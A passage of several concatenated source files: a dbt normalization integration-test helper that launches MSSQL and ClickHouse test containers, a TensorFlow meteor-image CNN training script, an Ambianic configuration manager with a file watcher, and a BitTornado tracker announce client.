"-h",
f"{self.container_prefix}_mssql",
"-e",
"ACCEPT_EULA='Y'",
"-e",
f"SA_PASSWORD='{config['password']}'",
"-e",
"MSSQL_PID='Standard'",
"-p",
f"{config['port']}:1433",
"-d",
"mcr.microsoft.com/mssql/server:2019-GA-ubuntu-16.04",
]
# cmds & parameters
cmd_start_container = " ".join(command_start_container)
wait_sec = 30
# run the docker container
print("Executing: ", cmd_start_container)
subprocess.check_call(cmd_start_container, shell=True)
# wait until the service is available
print(f"....Waiting for MS SQL Server to start...{wait_sec} sec")
time.sleep(wait_sec)
# Run additional commands to prepare the database
command_create_db = [
"docker",
"exec",
f"{self.container_prefix}_mssql",
"/opt/mssql-tools/bin/sqlcmd",
"-S",
config["host"],
"-U",
config["username"],
"-P",
config["password"],
"-Q",
f"CREATE DATABASE [{config['database']}]",
]
# create test db
print("Executing: ", " ".join(command_create_db))
subprocess.call(command_create_db)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/mssql.json", "w") as fh:
fh.write(json.dumps(config))
def setup_clickhouse_db(self):
"""
ClickHouse's official JDBC driver uses HTTP port 8123, while the Python ClickHouse
driver uses the native port 9000, so we need to open both ports: one for the
destination connector and one for the dbt container, respectively.
Ref: https://altinity.com/blog/2019/3/15/clickhouse-networking-part-1
"""
start_db = True
if os.getenv(NORMALIZATION_TEST_CLICKHOUSE_DB_PORT):
port = int(os.getenv(NORMALIZATION_TEST_CLICKHOUSE_DB_PORT))
start_db = False
else:
port = self.find_free_port()
config = {
"host": "localhost",
"port": port,
"database": self.target_schema,
"username": "default",
"password": "",
"ssl": False,
}
if start_db:
self.db_names.append("clickhouse")
print("Starting localhost clickhouse container for tests")
commands = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_clickhouse",
"--ulimit",
"nofile=262144:262144",
"-p",
"9000:9000", # Python clickhouse driver use native port
"-p",
f"{config['port']}:8123", # clickhouse JDBC driver use HTTP port
"-d",
# so far, only the latest ClickHouse server image has window functions enabled
"clickhouse/clickhouse-server:latest",
]
print("Executing: ", " ".join(commands))
subprocess.call(commands)
print("....Waiting for ClickHouse DB to start...15 sec")
time.sleep(15)
# Run additional commands to prepare the database
command_create_db = [
"docker",
"run",
"--rm",
"--link",
f"{self.container_prefix}_clickhouse:clickhouse-server",
"clickhouse/clickhouse-client:21.8.10.19",
"--host",
"clickhouse-server",
"--query",
f"CREATE DATABASE IF NOT EXISTS {config['database']}",
]
# create test db
print("Executing: ", " ".join(command_create_db))
subprocess.call(command_create_db)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/clickhouse.json", "w") as fh:
fh.write(json.dumps(config))
@staticmethod
def find_free_port():
"""
Find an unused localhost port on which a test database container (e.g. destination-postgres) can listen
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
addr = s.getsockname()
s.close()
return addr[1]
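# Note on the technique above: binding a socket to port 0 asks the OS for an ephemeral
# port, which is then closed and handed to the docker "-p" mapping further up. There is a
# small window in which another process could grab the port before the container binds it,
# which is accepted here as a test-only trade-off. Minimal usage sketch (hypothetical):
#   port = DbtIntegrationTest.find_free_port()
#   print(f"test database will listen on localhost:{port}")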
def tear_down_db(self):
for db_name in self.db_names:
print(f"Stopping localhost {db_name} container for tests")
try:
subprocess.call(["docker", "kill", f"{self.container_prefix}_{db_name}"])
except Exception as e:
print(f"WARN: Exception while shutting down {db_name}: {e}")
@staticmethod
def change_current_test_dir(request):
# This makes the test run whether it is executed from the tests folder (with pytest/gradle)
# or from the base-normalization folder (through pycharm)
integration_tests_dir = os.path.join(request.fspath.dirname, "integration_tests")
if os.path.exists(integration_tests_dir):
os.chdir(integration_tests_dir)
else:
os.chdir(request.fspath.dirname)
def generate_profile_yaml_file(self, destination_type: DestinationType, test_root_dir: str) -> Dict[str, Any]:
"""
Each destination requires different settings to connect to. This step generates the appropriate profiles.yml,
as described here: https://docs.getdbt.com/reference/profiles.yml
"""
config_generator = TransformConfig()
profiles_config = config_generator.read_json_config(f"../secrets/{destination_type.value.lower()}.json")
# Adapt credential file to look like destination config.json
if destination_type.value == DestinationType.BIGQUERY.value:
credentials = profiles_config["basic_bigquery_config"]
profiles_config = {
"credentials_json": json.dumps(credentials),
"dataset_id": self.target_schema,
"project_id": credentials["project_id"],
}
elif destination_type.value == DestinationType.MYSQL.value:
profiles_config["database"] = self.target_schema
else:
profiles_config["schema"] = self.target_schema
if destination_type.value == DestinationType.CLICKHOUSE.value:
# The Python ClickHouse driver uses native port 9000, which differs from the
# HTTP port used by the official ClickHouse JDBC driver
clickhouse_config = copy(profiles_config)
clickhouse_config["port"] = 9000
profiles_yaml = config_generator.transform(destination_type, clickhouse_config)
else:
profiles_yaml = config_generator.transform(destination_type, profiles_config)
config_generator.write_yaml_config(test_root_dir, profiles_yaml, "profiles.yml")
return profiles_config
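# Minimal usage sketch (hypothetical test directory): write a profiles.yml for Postgres
# into a test root dir and keep the raw connection settings for later assertions.
#   test = DbtIntegrationTest()
#   profiles = test.generate_profile_yaml_file(DestinationType.POSTGRES, "/tmp/dbt_test_root")
#   print(profiles["schema"])  # the target schema configured above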
@staticmethod
def run_destination_process(message_file: str, test_root_dir: str, commands: List[str]):
print("Executing: ", " ".join(commands))
with open(os.path.join(test_root_dir, "destination_output.log"), "ab") as f:
process = subprocess.Popen(commands, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def writer():
if os.path.exists(message_file):
with open(message_file, "rb") as input_data:
while True:
line = input_data.readline()
if not line:
break
process.stdin.write(line)
process.stdin.close()
thread = threading.Thread(target=writer)
thread.start()
for line in iter(process.stdout.readline, b""):
f.write(line)
sys.stdout.write(line.decode("utf-8"))
thread.join()
process.wait()
return process.returncode == 0
@staticmethod
def get_normalization_image(destination_type: DestinationType) -> str:
if DestinationType.MSSQL.value == destination_type.value:
return "airbyte/normalization-mssql:dev"
elif DestinationType.MYSQL.value == destination_type.value:
return "airbyte/normalization-mysql:dev"
elif DestinationType.ORACLE.value == destination_type.value:
return "airbyte/normalization-oracle:dev"
elif DestinationType.CLICKHOUSE.value == destination_type.value:
return "airbyte/normalization-clickhouse:dev"
elif DestinationType.SNOWFLAKE.value == destination_type.value:
return "airbyte/normalization-snowflake:dev"
else:
return "airbyte/normalization:dev"
def dbt_check(self, destination_type: DestinationType, test_root_dir: str):
"""
Run the dbt CLI to perform transformations on the test raw data in the destination
"""
normalization_image: str = self.get_normalization_image(destination_type)
# Perform sanity check on dbt project settings
assert self.run_check_dbt_command(normalization_image, "debug", test_root_dir)
assert self.run_check_dbt_command(normalization_image, "deps", test_root_dir)
def dbt_run(self, destination_type: DestinationType, test_root_dir: str, force_full_refresh: bool = False):
"""
Run the dbt CLI to perform transformations on the test raw data in the destination
"""
normalization_image: str = self.get_normalization_image(destination_type)
# Compile dbt model files into the destination's SQL dialect, then run the transformation queries
assert self.run_check_dbt_command(normalization_image, "run", test_root_dir, force_full_refresh)
@staticmethod
def run_check_dbt_command(normalization_image: str, command: str, cwd: str, force_full_refresh: bool = False) -> bool:
"""
Run the dbt subprocess while checking for and counting "ERROR", "FAIL" or "WARNING" lines printed in its output
"""
if normalization_image.startswith("airbyte/normalization-oracle") or normalization_image.startswith("airbyte/normalization-mysql"):
dbtAdditionalArgs = []
else:
dbtAdditionalArgs = ["--event-buffer-size=10000"]
error_count = 0
commands = (
[
"docker",
"run",
"--rm",
"--init",
"-v",
f"{cwd}:/workspace",
"-v",
f"{cwd}/build:/build",
"-v",
f"{cwd}/logs:/logs",
"-v",
f"{cwd}/build/dbt_packages:/dbt",
"--network",
"host",
"--entrypoint",
"/usr/local/bin/dbt",
"-i",
normalization_image,
]
+ dbtAdditionalArgs
+ [
command,
"--profiles-dir=/workspace",
"--project-dir=/workspace",
]
)
if force_full_refresh:
commands.append("--full-refresh")
command = f"{command} --full-refresh"
print("Executing: ", " ".join(commands))
print(f"Equivalent to: dbt {command} --profiles-dir={cwd} --project-dir={cwd}")
with open(os.path.join(cwd, "dbt_output.log"), "ab") as f:
process = subprocess.Popen(commands, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=os.environ)
for line in iter(lambda: process.stdout.readline(), b""):
f.write(line)
str_line = line.decode("utf-8")
sys.stdout.write(str_line)
# keywords to match lines as signaling errors
if "ERROR" in str_line or "FAIL" in str_line or "WARNING" in str_line:
# exception keywords in lines to ignore as errors (such as summary or expected warnings)
is_exception = False
for except_clause in [
"Done.", # DBT Summary
"PASS=", # DBT Summary
"Nothing to do.", # When no schema/data tests are setup
"Configuration paths exist in your dbt_project.yml", # When no cte / view are generated
"Error loading config file: .dockercfg: $HOME is not defined", # ignore warning
"depends on a node named 'disabled_test' which was not found", # Tests throwing warning because it is disabled
"The requested image's platform (linux/amd64) does not match the detected host platform "
+ "(linux/arm64/v8) and no specific platform was requested", # temporary patch until we publish images for arm64
]:
if except_clause in str_line:
is_exception = True
break
if not is_exception:
# count lines signaling an error/failure/warning
error_count += 1
process.wait()
message = (
f"{' '.join(commands)}\n\tterminated with return code {process.returncode} "
f"with {error_count} 'Error/Warning/Fail' mention(s)."
)
print(message)
assert error_count == 0, message
assert process.returncode == 0, message
if error_count > 0:
return False
return process.returncode == 0
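# Minimal usage sketch (hypothetical image/path): run `dbt debug` through the default
# normalization image against a prepared workspace and assert it produced no errors.
#   ok = DbtIntegrationTest.run_check_dbt_command(
#       "airbyte/normalization:dev", "debug", "/tmp/test_normalization_workspace")
#   assert ok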
@staticmethod
def copy_replace(src, dst, pattern=None, replace_value=None):
"""
Copies a file from src to dst replacing pattern by replace_value
Parameters
----------
src : string
Path to the source filename to copy from
dst : string
Path to the output filename to copy to
pattern
list of Patterns to replace inside the src file
replace_value
list of Values to replace by in the dst file
"""
file1 = open(src, "r") if isinstance(src, str) else src
file2 = open(dst, "w") if isinstance(dst, str) else dst
pattern = [pattern] if isinstance(pattern, str) else pattern
replace_value = [replace_value] if isinstance(replace_value, str) else replace_value
if replace_value and pattern:
if len(replace_value) != len(pattern):
raise Exception("Invalid parameters: pattern and replace_value" " have different sizes.")
rules = [(re.compile(regex, re.IGNORECASE), value) for regex, value in zip(pattern, replace_value)]
else:
rules = []
for line in file1:
if rules:
for rule in rules:
line = re.sub(rule[0], rule[1], line)
file2.write(line)
if isinstance(src, str):
file1.close()
if isinstance(dst, str):
file2.close()
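# Minimal usage sketch (hypothetical files/patterns): copy a dbt_project.yml template
# while substituting a schema placeholder, showing how pattern and replace_value pair up.
#   DbtIntegrationTest.copy_replace(
#       "dbt_project.yml.tpl", "dbt_project.yml",
#       pattern=["schema_placeholder"], replace_value=["test_normalization"])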
@staticmethod
def get_test_targets() -> List[str]:
"""
Returns a list of destinations to run tests on.
If the environment variable NORMALIZATION_TEST_TARGET is set to a comma-separated list of destination names,
then the tests are run only on that subset of destinations.
Otherwise, tests are run against all destinations.
"""
if os.getenv(NORMALIZATION_TEST_TARGET):
target_str = os.getenv(NORMALIZATION_TEST_TARGET)
return [d.value for d in {DestinationType.from_string(s.strip()) for s in target_str.split(",")}]
else:
return [d.value for d in DestinationType]
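# Minimal usage sketch (hypothetical): restrict the test run to two destinations via the
# environment variable documented above.
#   os.environ[NORMALIZATION_TEST_TARGET] = "postgres,mysql"
#   print(DbtIntegrationTest.get_test_targets())  # e.g. ['postgres', 'mysql']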
|
results_2_11_code.py
|
import tensorflow as tf
from tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten, BatchNormalization
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import Callback
from os.path import join
from os import listdir
import multiprocessing
from performanceMeasure import getPerformanceMeasures, plotAccuracyAndLoss, getProblematicMeteors
def trainCNN( ):
tf.keras.backend.clear_session()
modelNumber = 'model_2_11'
base_dir = r'C:\work_dir\meteorData\extraData_filtered_30_split_70_30'
results_dir = join(r'G:\GIEyA\TFG\meteor_classification\results_2', modelNumber)
results_dir_weights = join(results_dir, 'weights')
train_dir = join(base_dir, 'train')
validation_dir = join(base_dir, 'validation')
ImageResolution: tuple = (432, 432)
ImageResolutionGrayScale: tuple = (432, 432, 1)
DROPOUT: float = 0.30
EPOCHS: int = 15
LEARNING_RATE: float = 5e-4
# Training -> 62483 (3905x16)
# Validation -> 26780 (1673x16)
training_images = len(listdir(join(train_dir, 'meteors'))) + len(listdir(join(train_dir, 'non_meteors')))
validation_images = len(listdir(join(validation_dir, 'meteors'))) + len(listdir(join(validation_dir, 'non_meteors')))
batch_size: int = 16
steps_per_epoch: int = int(training_images / batch_size)
validation_steps: int = int(validation_images / batch_size)
#Rescale all images by 1./255
train_datagen = ImageDataGenerator(rescale=1.0/255)
validation_datagen = ImageDataGenerator(rescale=1.0/255.)
train_generator = train_datagen.flow_from_directory(train_dir,
batch_size=batch_size,
class_mode='binary',
color_mode='grayscale',
target_size=ImageResolution)
validation_generator = validation_datagen.flow_from_directory(validation_dir,
batch_size=batch_size,
class_mode='binary',
color_mode='grayscale',
target_size=ImageResolution)
# elu activation vs relu activation -> model_2_02 and model_2_03
# dropout evaluation: model_2_02 (.3) vs model_2_06 (no dropout) vs model_2_07 (.4) vs model_2_08 (.5):
# model 2.9 -> Simple CNN (5 conv layers + 2 fully-connected) -> Only 123,209 parameters. Training time: 550 s/epoch
# model 2.10 -> 2.9 with filtered data
# model 2.11 -> Very complex CNN + BatchNormalization (???) -> ??? parameters. Training time: ???
model = tf.keras.models.Sequential([
Conv2D(12, (7, 7), activation='elu', input_shape=ImageResolutionGrayScale, strides=1),
Conv2D(16, (7, 7), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
BatchNormalization(),
#Dropout(DROPOUT),
Conv2D(16, (5, 5), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (5, 5), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
BatchNormalization(),
#Dropout(DROPOUT),
Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (3, 3), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
BatchNormalization(),
#Dropout(DROPOUT),
Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (3, 3), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
BatchNormalization(),
#Dropout(DROPOUT),
Conv2D(16, (3, 3), activation='elu', kernel_initializer='he_uniform'),
Conv2D(24, (3, 3), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
BatchNormalization(),
#Dropout(DROPOUT),
Conv2D(24, (2, 2), activation='elu', kernel_initializer='he_uniform'),
Conv2D(32, (2, 2), activation='elu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
BatchNormalization(),
#Dropout(DROPOUT),
Flatten(),
Dense(288, activation='elu', kernel_initializer='he_uniform'),
BatchNormalization(),
#Dropout(DROPOUT),
Dense(16, activation='elu', kernel_initializer='he_uniform'),
BatchNormalization(),
#Dropout(DROPOUT - 0.10),
Dense(1, activation='sigmoid', kernel_initializer='he_uniform')
])
print(model.summary())
optimizer = Adam(learning_rate=LEARNING_RATE)
model.compile(optimizer=optimizer,
loss='binary_crossentropy',
metrics=['accuracy'])
class SaveModelCallback(Callback):
def __init__(self, thresholdTrain, thresholdValid):
super(SaveModelCallback, self).__init__()
self.thresholdTrain = thresholdTrain
self.thresholdValid = thresholdValid
def on_epoch_end(self, epoch, logs=None):
if((logs.get('accuracy') >= self.thresholdTrain) and (logs.get('val_accuracy') >= self.thresholdValid)):
model.save_weights(join(results_dir_weights, modelNumber + '_acc_' + str(logs.get('accuracy'))[0:5]
+ '_val_acc_' + str(logs.get('val_accuracy'))[0:5] + '.h5'), save_format='h5')
#model.load_weights(join('G:\GIEyA\TFG\meteor_classification\\results_2\model_2_02\weights',
# 'model_2_02_acc_0.9049_val_acc_0.8934.h5'))
callback_89_89 = SaveModelCallback(0.890, 0.890)
history = model.fit(train_generator,
validation_data=validation_generator,
steps_per_epoch=steps_per_epoch,
epochs=EPOCHS, # Later train with more epochs if necessary
validation_steps=validation_steps,
shuffle=True,
verbose=1,
callbacks=[callback_89_89])
#model.load_weights(join(results_dir_weights, 'model_2_09_acc_0.917_val_acc_0.882.h5'))
#dataDir = 'C:\work_dir\meteorData\extra_data_filtered_30'
#problematicFile = join('G:\GIEyA\TFG\meteor_classification\\results_2', 'problematicData_40_1.txt')
#getProblematicMeteors(model, dataDir, ImageResolution, problematicFile, margin=0.40)
################################# PRINT MODEL PERFORMANCE AND GET PERFORMANCE MEASURES #################################
# Get performance measures:
getPerformanceMeasures(model, validation_dir, ImageResolution, join(results_dir, 'performance_' + modelNumber + '.txt'), threshold=0.50)
# Plot Accuracy and Loss in both train and validation sets
plotAccuracyAndLoss(history)
#########################################################################################################################
if __name__ == '__main__':
p = multiprocessing.Process(target=trainCNN)
p.start()
p.join()
|
configuration_manager.py
|
"""Centralized configuration manager."""
import os
import logging
import threading
import yaml
from inotify_simple import INotify, flags
from ambianic.config_mgm.config_diff import Config
from ambianic.config_mgm import fileutils
log = logging.getLogger(__name__)
class ConfigurationManager:
"""Configuration manager handles configuration centrally and
notify via callbacks of changes
"""
def __init__(self, work_dir=None, config=None):
self.Config = Config
self.CONFIG_FILE = "config.yaml"
self.SECRETS_FILE = "secrets.yaml"
self.lock = threading.RLock()
self.__config = None
self.watch_thread = None
self.watch_event = threading.Event()
self.handlers = []
if config is not None:
self.set(config)
if work_dir is not None:
self.load(work_dir)
def stop(self):
"""Stop the config manager"""
self.handlers = []
with self.lock:
self.__config = None
self.watch_stop()
if self.watch_thread is not None:
self.watch_thread.join()
self.watch_thread = None
def register_handler(self, callback):
"""Register a callback to trigger when there is a configuration update"""
self.handlers.append(callback)
def unregister_handler(self, callback):
"""Remove a callback from the configuration updates handlers"""
self.handlers.remove(callback)
def __watcher(self):
"""Watch for file changes"""
inotify = INotify()
wd = inotify.add_watch(self.work_dir, flags.MODIFY)
while not self.watch_event.is_set():
for event in inotify.read(timeout=100, read_delay=100):
for filename in [self.CONFIG_FILE, self.SECRETS_FILE]:
if event.name == filename:
log.info("File change detected: %s", filename)
self.load(self.work_dir)
break
# stop watching
inotify.rm_watch(wd)
def watch_start(self):
"""Start watching fs for changes"""
if self.watch_thread is None:
self.watch_event.clear()
self.watch_thread = threading.Thread(target=self.__watcher)
self.watch_thread.start()
def watch_stop(self):
"""Stop watching fs for changes"""
self.watch_event.set()
def save(self):
"""Save configuration to file"""
if self.get() is None:
return
fileutils.save(self.get_config_file(), self.get())
def get_config_file(self) -> str:
"""Return the config file path"""
return os.path.join(self.work_dir, self.CONFIG_FILE)
def get_secrets_file(self) -> str:
"""Return the secrets file path"""
return os.path.join(self.work_dir, self.SECRETS_FILE)
def load(self, work_dir) -> Config:
"""Load configuration from file"""
assert os.path.exists(work_dir), \
'working directory invalid: {}'.format(work_dir)
self.work_dir = work_dir
self.watch_start()
secrets_file = self.get_secrets_file()
config_file = self.get_config_file()
try:
if os.path.isfile(secrets_file):
with open(secrets_file) as sf:
secrets_config = sf.read()
else:
secrets_config = ""
log.warning('Secrets file not found. '
'Proceeding without it: %s',
secrets_file)
with open(config_file) as cf:
base_config = cf.read()
all_config = secrets_config + "\n" + base_config
config = yaml.safe_load(all_config)
log.debug('loaded config from %r: %r',
self.CONFIG_FILE, config)
return self.set(config)
except FileNotFoundError:
log.warning('Configuration file not found: %s', config_file)
log.warning(
'Please provide a configuration file and restart.')
except Exception as e:
log.exception('Configuration Error!', exc_info=True)
return None
def get_sources(self) -> Config:
"""Return sources configuration"""
config = self.get()
if config is None:
return None
if config.get("sources", None) is None:
config.set("sources", {})
return config.get("sources", None)
def get_source(self, source: str) -> Config:
"""Return a source by name"""
sources = self.get_sources()
if sources is None:
return None
return sources.get(source, None)
def get_ai_models(self) -> Config:
"""Return ai_models configuration"""
config = self.get()
if config is None:
return None
if config.get("ai_models", None) is None:
config.set("ai_models", {})
return config.get("ai_models", None)
def get_ai_model(self, ai_model: str) -> Config:
"""Return an ai_model by name"""
ai_models = self.get_ai_models()
if ai_models is None:
return None
return ai_models.get(ai_model, None)
def get_pipelines(self) -> Config:
"""Return ai_models configuration"""
config = self.get()
return config.get("pipelines", None)
def get_pipeline(self, name) -> Config:
"""Return pipeline configuration"""
pipelines = self.get_pipelines()
return pipelines.get(name, None)
def get_data_dir(self) -> Config:
"""Return data_dir configuration"""
config = self.get()
return config.get("data_dir", None)
def get(self) -> Config:
"""Get stored configuration.
Parameters
----------
Returns
-------
dictionary
Returns a dictionary with current configurations.
"""
with self.lock:
return self.__config
def set(self, new_config: dict) -> Config:
"""Set configuration
:Parameters:
----------
new_config : dictionary
The new configurations to apply
:Returns:
-------
config: dictionary
Return the current configurations.
"""
with self.lock:
if self.__config is None:
self.__config = Config(new_config)
else:
self.__config.sync(new_config)
for handler in self.handlers:
handler(self.get())
return self.get()
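# Minimal usage sketch (hypothetical config values): register a change handler, push a new
# configuration, and shut the manager down. set() notifies every registered handler with the
# merged Config object, and load()/the inotify watcher do the same when the files change.
#   def on_change(config):
#       print("sources now:", config.get("sources", None))
#   mgr = ConfigurationManager()
#   mgr.register_handler(on_change)
#   mgr.set({"sources": {"front_door_cam": {"uri": "rtsp://example/stream"}}})
#   mgr.stop()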
|
Rerequester.py
|
# Written by Bram Cohen
# modified for multitracker operation by John Hoffman
# see LICENSE.txt for license information
from herd.BitTornado.zurllib import urlopen, quote
from urlparse import urlparse, urlunparse
from socket import gethostbyname
from btformats import check_peers
from herd.BitTornado.bencode import bdecode
from threading import Thread, Lock
from cStringIO import StringIO
from traceback import print_exc
from socket import error, gethostbyname
from random import shuffle
try:
from hashlib import sha1 as sha
except ImportError:
from sha import sha
from time import time
try:
from os import getpid
except ImportError:
def getpid():
return 1
try:
True
except:
True = 1
False = 0
mapbase64 = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz.-'
keys = {}
basekeydata = str(getpid()) + repr(time()) + 'tracker'
def add_key(tracker):
key = ''
for i in sha(basekeydata+tracker).digest()[-6:]:
key += mapbase64[ord(i) & 0x3F]
keys[tracker] = key
def get_key(tracker):
try:
return "&key="+keys[tracker]
except:
add_key(tracker)
return "&key="+keys[tracker]
class fakeflag:
def __init__(self, state=False):
self.state = state
def wait(self):
pass
def isSet(self):
return self.state
class Rerequester:
def __init__(self, trackerlist, interval, sched, howmany, minpeers,
connect, externalsched, amount_left, up, down,
port, ip, myid, infohash, timeout, errorfunc, excfunc,
maxpeers, doneflag, upratefunc, downratefunc,
unpauseflag = fakeflag(True),
seed_id = '', seededfunc = None, force_rapid_update = False ):
self.excfunc = excfunc
newtrackerlist = []
for tier in trackerlist:
if len(tier)>1:
shuffle(tier)
newtrackerlist += [tier]
self.trackerlist = newtrackerlist
self.lastsuccessful = ''
self.rejectedmessage = 'rejected by tracker - '
self.url = ('?info_hash=%s&peer_id=%s&port=%s' %
(quote(infohash), quote(myid), str(port)))
self.ip = ip
self.interval = interval
self.last = None
self.trackerid = None
self.announce_interval = 30 * 60
self.sched = sched
self.howmany = howmany
self.minpeers = minpeers
self.connect = connect
self.externalsched = externalsched
self.amount_left = amount_left
self.up = up
self.down = down
self.timeout = timeout
self.errorfunc = errorfunc
self.maxpeers = maxpeers
self.doneflag = doneflag
self.upratefunc = upratefunc
self.downratefunc = downratefunc
self.unpauseflag = unpauseflag
if seed_id:
self.url += '&seed_id='+quote(seed_id)
self.seededfunc = seededfunc
if seededfunc:
self.url += '&check_seeded=1'
self.force_rapid_update = force_rapid_update
self.last_failed = True
self.never_succeeded = True
self.errorcodes = {}
self.lock = SuccessLock()
self.special = None
self.stopped = False
def start(self):
self.sched(self.c, self.interval/2)
self.d(0)
def c(self):
if self.stopped:
return
if not self.unpauseflag.isSet() and (
self.howmany() < self.minpeers or self.force_rapid_update ):
self.announce(3, self._c)
else:
self._c()
def _c(self):
self.sched(self.c, self.interval)
def d(self, event = 3):
if self.stopped:
return
if not self.unpauseflag.isSet():
self._d()
return
self.announce(event, self._d)
def _d(self):
if self.never_succeeded:
self.sched(self.d, 60) # retry in 60 seconds
elif self.force_rapid_update:
return
else:
self.sched(self.d, self.announce_interval)
def hit(self, event = 3):
if not self.unpauseflag.isSet() and (
self.howmany() < self.minpeers or self.force_rapid_update ):
self.announce(event)
def announce(self, event = 3, callback = lambda: None, specialurl = None):
if specialurl is not None:
s = self.url+'&uploaded=0&downloaded=0&left=1' # don't add to statistics
if self.howmany() >= self.maxpeers:
s += '&numwant=0'
else:
s += '&no_peer_id=1&compact=1'
self.last_failed = True # force true, so will display an error
self.special = specialurl
self.rerequest(s, callback)
return
else:
s = ('%s&uploaded=%s&downloaded=%s&left=%s' %
(self.url, str(self.up()), str(self.down()),
str(self.amount_left())))
if self.last is not None:
s += '&last=' + quote(str(self.last))
if self.trackerid is not None:
s += '&trackerid=' + quote(str(self.trackerid))
if self.howmany() >= self.maxpeers:
s += '&numwant=0'
else:
s += '&no_peer_id=1&compact=1'
if event != 3:
s += '&event=' + ['started', 'completed', 'stopped'][event]
if event == 2:
self.stopped = True
self.rerequest(s, callback)
def snoop(self, peers, callback = lambda: None): # tracker call support
self.rerequest(self.url
+'&event=stopped&port=0&uploaded=0&downloaded=0&left=1&tracker=1&numwant='
+str(peers), callback)
def rerequest(self, s, callback):
if not self.lock.isfinished(): # still waiting for prior cycle to complete??
def retry(self = self, s = s, callback = callback):
self.rerequest(s, callback)
self.sched(retry,5) # retry in 5 seconds
return
self.lock.reset()
rq = Thread(target = self._rerequest, args = [s, callback])
rq.setDaemon(False)
rq.start()
def _rerequest(self, s, callback):
try:
def fail (self = self, callback = callback):
self._fail(callback)
if self.ip:
try:
s += '&ip=' + gethostbyname(self.ip)
except:
self.errorcodes['troublecode'] = 'unable to resolve: '+self.ip
self.externalsched(fail)
self.errorcodes = {}
if self.special is None:
for t in range(len(self.trackerlist)):
for tr in range(len(self.trackerlist[t])):
tracker = self.trackerlist[t][tr]
if self.rerequest_single(tracker, s, callback):
if not self.last_failed and tr != 0:
del self.trackerlist[t][tr]
self.trackerlist[t] = [tracker] + self.trackerlist[t]
return
else:
tracker = self.special
self.special = None
if self.rerequest_single(tracker, s, callback):
return
# no success from any tracker
self.externalsched(fail)
except:
self.exception(callback)
def _fail(self, callback):
if ( (self.upratefunc() < 100 and self.downratefunc() < 100)
or not self.amount_left() ):
for f in ['rejected', 'bad_data', 'troublecode']:
if self.errorcodes.has_key(f):
r = self.errorcodes[f]
break
else:
r = 'Problem connecting to tracker - unspecified error'
return
self.errorfunc(r)
self.last_failed = True
self.lock.give_up()
self.externalsched(callback)
def rerequest_single(self, t, s, callback):
l = self.lock.set()
rq = Thread(target = self._rerequest_single, args = [t, s+get_key(t), l, callback])
rq.setDaemon(False)
rq.start()
self.lock.wait()
if self.lock.success:
self.lastsuccessful = t
self.last_failed = False
self.never_succeeded = False
return True
if not self.last_failed and self.lastsuccessful == t:
# if the last tracker hit was successful, and you've just tried the tracker
# you'd contacted before, don't go any further, just fail silently.
self.last_failed = True
self.externalsched(callback)
self.lock.give_up()
return True
return False # returns true if it wants rerequest() to exit
def _rerequest_single(self, t, s, l, callback):
try:
closer = [None]
def timedout(self = self, l = l, closer = closer):
if self.lock.trip(l):
self.errorcodes['troublecode'] = 'Problem connecting to tracker - timeout exceeded'
self.lock.unwait(l)
try:
closer[0]()
except:
pass
self.externalsched(timedout, self.timeout)
err = None
try:
h = urlopen(t+s)
closer[0] = h.close
data = h.read()
except (IOError, error), e:
err = 'Problem connecting to tracker - ' + str(e)
except:
err = 'Problem connecting to tracker'
try:
h.close()
except:
pass
if err:
if self.lock.trip(l):
self.errorcodes['troublecode'] = err
self.lock.unwait(l)
return
if data == '':
if self.lock.trip(l):
self.errorcodes['troublecode'] = 'no data from tracker'
self.lock.unwait(l)
return
try:
r = bdecode(data, sloppy=1)
check_peers(r)
except ValueError, e:
if self.lock.trip(l):
self.errorcodes['bad_data'] = 'bad data from tracker - ' + str(e)
self.lock.unwait(l)
return
if r.has_key('failure reason'):
if self.lock.trip(l):
self.errorcodes['rejected'] = self.rejectedmessage + r['failure reason']
self.lock.unwait(l)
return
if self.lock.trip(l, True): # success!
self.lock.unwait(l)
else:
callback = lambda: None # attempt timed out, don't do a callback
# even if the attempt timed out, go ahead and process data
def add(self = self, r = r, callback = callback):
self.postrequest(r, callback)
self.externalsched(add)
except:
self.exception(callback)
def postrequest(self, r, callback):
if r.has_key('warning message'):
self.errorfunc('warning from tracker - ' + r['warning message'])
self.announce_interval = r.get('interval', self.announce_interval)
self.interval = r.get('min interval', self.interval)
self.trackerid = r.get('tracker id', self.trackerid)
self.last = r.get('last')
# ps = len(r['peers']) + self.howmany()
p = r['peers']
peers = []
if type(p) == type(''):
for x in xrange(0, len(p), 6):
ip = '.'.join([str(ord(i)) for i in p[x:x+4]])
port = (ord(p[x+4]) << 8) | ord(p[x+5])
peers.append(((ip, port), 0))
else:
for x in p:
peers.append(((x['ip'].strip(), x['port']), x.get('peer id',0)))
ps = len(peers) + self.howmany()
if ps < self.maxpeers:
if self.doneflag.isSet():
if r.get('num peers', 1000) - r.get('done peers', 0) > ps * 1.2:
self.last = None
else:
if r.get('num peers', 1000) > ps * 1.2:
self.last = None
if self.seededfunc and r.get('seeded'):
self.seededfunc()
elif peers:
shuffle(peers)
self.connect(peers)
callback()
def exception(self, callback):
data = StringIO()
print_exc(file = data)
def r(s = data.getvalue(), callback = callback):
if self.excfunc:
self.excfunc(s)
else:
print s
callback()
self.externalsched(r)
